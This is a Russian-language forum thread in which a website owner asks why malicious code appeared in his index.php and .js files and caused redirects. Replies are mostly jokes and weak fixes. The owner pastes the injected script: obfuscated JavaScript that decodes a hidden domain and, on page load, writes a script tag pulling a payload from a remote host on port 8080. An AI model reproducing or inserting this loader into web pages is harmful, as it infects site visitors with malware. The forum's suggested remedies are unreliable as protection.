ФорумПрограммированиеPHP для идиотов → атака .js .php

атака .js .php

  • Xakkap

    Сообщения: 29 Репутация: N Группа: Кто попало

    Spritz 28 января 2010 г. 7:56

    У меня на сайте началось атака вредоносных кодов ((
    В index.php и в файлах .js загружается коды сегодня даже редирект на другои сайт сделали оО
    Удалил всё норм .

    В файлах index.php в конце на всякий случай поставил код:

    <? echo exit(""); ?>


    А в .js файлах какои код чтоб после этого кода нечего уже не выполнялось ?

    Да иза чего у меня загрузились эти коды ?
    Анти-Вир молчи чёта :(
  • phpdude

    Сообщения: 26624 Репутация: N Группа: в ухо

    Spritz 28 января 2010 г. 8:04, спустя 7 минут 32 секунды

    Xakkap, ну ты же хакер, должен все это знать! не пудри нам голову!
    Сапожник без сапог
  • adw0rd

    Сообщения: 22905 Репутация: N Группа: в ухо

    Spritz 28 января 2010 г. 8:07, спустя 3 минуты 21 секунду

    Xakkap, для js
    return
    Спустя 35 сек.
    Да иза чего у меня загрузились эти коды ?
    ftp-клиент поломанный у какого-то клиента, скорее всего ты
    adw/0
  • Xakkap

    Сообщения: 29 Репутация: N Группа: Кто попало

    Spritz 28 января 2010 г. 8:08, спустя 42 секунды

    phpdude, Ник мой Хаккар а не Хаккер =)

    Реально хз, но оч надо  ((
  • Ewg777

    Сообщения: 510 Репутация: N Группа: Джедаи

    Spritz 28 января 2010 г. 8:14, спустя 6 минут 19 секунд

    Хакапа, на антивир нужно новые мелодии закачивать, чтобы он не молчал.  
    Спустя 124 сек.
    <? echo exit(""); ?>
    юзай while(print(exit));
  • adw0rd

    Сообщения: 22905 Репутация: N Группа: в ухо

    Spritz 28 января 2010 г. 8:17, спустя 2 минуты 15 секунд

    :D
    Спустя 55 сек.
    Xakkap, для php надо
    <?php exit; ?>
    adw/0
  • Xakkap

    Сообщения: 29 Репутация: N Группа: Кто попало

    Spritz 28 января 2010 г. 8:25, спустя 8 минут 40 секунд

    adw0rd,
    Ewg777,

    Спс !
  • Xakkap

    Сообщения: 29 Репутация: N Группа: Кто попало

    Spritz 29 января 2010 г. 7:22, спустя 22 часа 57 минут 2 секунды

    Во скрипт в index.php

    <script> try{window.onload=function(){document.write('<div id=Ma51r5z2gr>alice-it.imageshack.us.qq</div>');Jjh6ahkfer = document.getElementById('Ma51r5z2gr').innerHTML + '-(&&!c&#(o!m#^.!(!n(e!^x)&$!t)([email protected]!i!&n#.([email protected]$^[email protected]#&:(!N!!)d#^[email protected])[email protected]$!$w#&c#j)))i$#$x^)&@(0&o&6$e(!^/$g#(!n##^a$^(v^i$#^.(@&c$^^o($(.^(&[email protected]@[email protected]#/[email protected]))g
    $&$)a)^v(i&^.^!$&c))o&^.^(j^))$p&^/$!)[email protected][email protected]$)[email protected])@!p^&#i#^r&@&a())t)@[email protected]^b$a&[email protected]!^.&#)o#)!r^#g^^$(#/&$g(o&##o(&g([email protected])[email protected](&.^)c((o^m(/@&@$w&&u!)n#$(&d^^$!e^r!&$&g$)@r$o$!)u)n$&$d#@.!c^!#)o)&!m(^(&/)#'.replace(/\(|&|#|@|\$|\^|\!|\)/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jjh6ahkfer.replace(/Ndkxwcjix0o6e/g, '8080')+'></scr'+'ipt>');} } catch(S8cq2e916 ) {}</script>
    <!–8d7a372dd613e50d7d1ac35d72c54688–>


    И в .js

    try{window.onload=function(){document.write('<div id=Ma51r5z2gr>alice-it.imageshack.us.qq</div>');Jjh6ahkfer = document.getElementById('Ma51r5z2gr').innerHTML + '-(&&!c&#(o!m#^.!(!n(e!^x)&$!t)([email protected]!i!&n#.([email protected]$^[email protected]#&:(!N!!)d#^[email protected])[email protected]$!$w#&c#j)))i$#$x^)&@(0&o&6$e(!^/$g#(!n##^a$^(v^i$#^.(@&c$^^o($(.^(&[email protected]@[email protected]#/[email protected]))g
    $&$)a)^v(i&^.^!$&c))o&^.^(j^))$p&^/$!)[email protected][email protected]$)[email protected])@!p^&#i#^r&@&a())t)@[email protected]^b$a&[email protected]!^.&#)o#)!r^#g^^$(#/&$g(o&##o(&g([email protected])[email protected](&.^)c((o^m(/@&@$w&&u!)n#$(&d^^$!e^r!&$&g$)@r$o$!)u)n$&$d#@.!c^!#)o)&!m(^(&/)#'.replace(/\(|&|#|@|\$|\^|\!|\)/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jjh6ahkfer.replace(/Ndkxwcjix0o6e/g, '8080')+'></scr'+'ipt>');} } catch(S8cq2e916 ) {}


    Которые были у меня
  • VaseninM

    Сообщения: 2416 Репутация: N Группа: Адекваты

    Spritz 29 января 2010 г. 7:34, спустя 12 минут


    <? echo exit(""); ?>
    юзай while(print(exit));

    Хорошо хоть не предложиз защищатся от вирусов тем же методом, что и переносы убирать :D
  • Ewg777

    Сообщения: 510 Репутация: N Группа: Джедаи

    Spritz 29 января 2010 г. 8:14, спустя 39 минут 44 секунды



    <? echo exit(""); ?>
    юзай while(print(exit));

    Хорошо хоть не предложиз защищатся от вирусов тем же методом, что и переносы убирать :D
    Стараюсь держаться. Авторский вариант ТС навеял такое решение.
    В файлах index.php в конце на всякий случай поставил код:

Пожалуйста, авторизуйтесь, чтобы написать комментарий!